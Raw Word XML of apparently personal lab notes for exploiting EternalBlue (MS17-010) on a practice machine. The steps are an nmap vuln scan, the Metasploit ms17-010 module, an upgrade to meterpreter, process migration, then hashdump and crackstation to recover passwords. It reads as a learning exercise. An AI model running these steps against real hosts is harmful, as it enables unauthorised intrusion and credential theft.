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79C8" w14:textId="0888A6BB" w:rsidR="009145B3" w:rsidRDefault="007F27A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> the device:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ABF383" w14:textId="07AEFF7C" w:rsidR="007F27A9" w:rsidRDefault="007F27A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># nmap -sV -vv --script vuln 10.10.41.182</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A2A274" w14:textId="77777777" w:rsidR="007F27A9" w:rsidRPr="007F27A9" w:rsidRDefault="007F27A9" w:rsidP="007F27A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This command utilizes the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool, a network scanning and security auditing utility, with the following options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F16E1" w14:textId="77777777" w:rsidR="007F27A9" w:rsidRPr="007F27A9" w:rsidRDefault="007F27A9" w:rsidP="007F27A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-sV</w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: This option instructs </w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform version detection against the target hosts. It attempts to determine the version of services running on the open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5D8E4D" w14:textId="77777777" w:rsidR="007F27A9" w:rsidRPr="007F27A9" w:rsidRDefault="007F27A9" w:rsidP="007F27A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-vv</w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: This option increases the verbosity level of the output, providing more detailed information about the scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2914A3" w14:textId="77777777" w:rsidR="007F27A9" w:rsidRPr="007F27A9" w:rsidRDefault="007F27A9" w:rsidP="007F27A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--script vuln</w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: This option specifies that </w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> should use the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> script, which is part of the Nmap Scripting Engine (NSE). This script is designed to detect vulnerabilities in the target system by performing various tests and checks against known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAE8218" w14:textId="4E243824" w:rsidR="007F27A9" w:rsidRDefault="007F27A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>How many ports are open with a port number under 1000?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB48FFF" w14:textId="23B07DAA" w:rsidR="007F27A9" w:rsidRDefault="007F27A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="PMingLiU-ExtB" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="007F27A9">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(from nmap scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124BC46C" w14:textId="5AA3856B" w:rsidR="00F75B4D" w:rsidRDefault="00F75B4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Now that I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="PMingLiU-ExtB" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ve found that ms17 is vulnerable, search for it</w:t>
      </w:r>
      <w:r w:rsidR="0013064B">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D69B3A4" w14:textId="1E130495" w:rsidR="00F75B4D" w:rsidRDefault="0013064B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00F75B4D" w:rsidRPr="00F75B4D">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00F75B4D">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="151C2B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> search ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CC9E56" w14:textId="13B5CA95" w:rsidR="0013064B" w:rsidRDefault="0013064B" w:rsidP="0013064B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 xml:space="preserve">Use 0, I picked </w:t>
      </w:r>
      <w:r w:rsidRPr="0013064B">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="153D63" w:themeColor="text2" w:themeTint="E6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>eternal blue</w:t>
      </w:r>
      <w:r w:rsidRPr="0013064B">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="153D63" w:themeColor="text2" w:themeTint="E6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>because it was</w:t>
      </w:r>
      <w:r w:rsidRPr="0013064B">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> average </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>not normal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDCFCFC" w14:textId="17881310" w:rsidR="0013064B" w:rsidRDefault="0013064B" w:rsidP="0013064B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 xml:space="preserve">SET RHOSTS {MY IP_ADDRESS} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB659C8" w14:textId="264EA10A" w:rsidR="00AA5A68" w:rsidRDefault="00AA5A68" w:rsidP="0013064B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>Set tun0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74229DB3" w14:textId="602F231A" w:rsidR="00AA5A68" w:rsidRDefault="00AA5A68" w:rsidP="0013064B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>Set lhosts tun0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E5B53B" w14:textId="4D432E68" w:rsidR="0013064B" w:rsidRDefault="00654704" w:rsidP="0013064B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>R</w:t>
      </w:r>
      <w:r w:rsidR="0013064B">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421FA9CC" w14:textId="32C0E525" w:rsidR="00654704" w:rsidRDefault="00654704" w:rsidP="0013064B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>NOW WE HAVE GAINED ACCESS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453501E7" w14:textId="6A4039F8" w:rsidR="00324BCB" w:rsidRDefault="00324BCB" w:rsidP="0013064B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>---ctrl+z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67583616" w14:textId="7C692C4D" w:rsidR="00324BCB" w:rsidRDefault="00324BCB" w:rsidP="0013064B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 xml:space="preserve">Search </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="F9F9FB"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>shell_to_meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495A7773" w14:textId="2D9C7C45" w:rsidR="00324BCB" w:rsidRDefault="00324BCB" w:rsidP="0013064B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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324BCB">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185713D4" w14:textId="42FF4C93" w:rsidR="00324BCB" w:rsidRDefault="00324BCB" w:rsidP="0013064B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>use 0 to pick it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D380AE2" w14:textId="390DFB0A" w:rsidR="00324BCB" w:rsidRDefault="00324BCB" w:rsidP="0013064B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>set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72224F28" w14:textId="4CBEF525" w:rsidR="00324BCB" w:rsidRDefault="00324BCB" w:rsidP="0013064B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>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEFCE51" w14:textId="525E534F" w:rsidR="000646E7" w:rsidRDefault="000646E7" w:rsidP="0013064B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lastRenderedPageBreak/>
        <w:t>getuid-</w:t>
      </w:r>
      <w:r w:rsidRPr="000646E7">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check your authority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47068A26" w14:textId="0FA5E0A0" w:rsidR="00CF5854" w:rsidRDefault="00CF5854" w:rsidP="0013064B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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>ps</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5854">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check out the processes, to know where we can migrate to..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE6A5EA" w14:textId="47D26167" w:rsidR="00CF5854" w:rsidRPr="00CF5854" w:rsidRDefault="00CF5854" w:rsidP="00CF5854">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU-ExtB" w:eastAsia="PMingLiU-ExtB" w:hAnsi="PMingLiU-ExtB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Use hashdump and crackstation to get the cleartext from hash</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CF5854" w:rsidRPr="00CF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1F53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE4E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180653"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C01A2EAC"/>
    <w:lvl w:ilvl="0" w:tplc="5F1660D2">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="PMingLiU-ExtB" w:hAnsi="Wingdings" w:cstheme="minorBidi" w:hint="default"/>
        <w:color w:val="151C2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45575">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="66921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F2"/>
    <w:rsid w:val="000646E7"/>
    <w:rsid w:val="0013064B"/>
    <w:rsid w:val="00324BCB"/>
    <w:rsid w:val="003A5DA8"/>
    <w:rsid w:val="003D5400"/>
    <w:rsid w:val="0047026A"/>
    <w:rsid w:val="004B5068"/>
    <w:rsid w:val="00561BDC"/>
    <w:rsid w:val="00654704"/>
    <w:rsid w:val="007F27A9"/>
    <w:rsid w:val="009145B3"/>
    <w:rsid w:val="009244B7"/>
    <w:rsid w:val="00A051F2"/>
    <w:rsid w:val="00AA5A68"/>
    <w:rsid w:val="00CF5854"/>
    <w:rsid w:val="00E53AFA"/>
    <w:rsid w:val="00F7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9189"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2A530336-CBFF-4083-AB5A-C743B9A2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6A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00A05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Anany</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Farah Anany</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-01T17:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-01T19:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>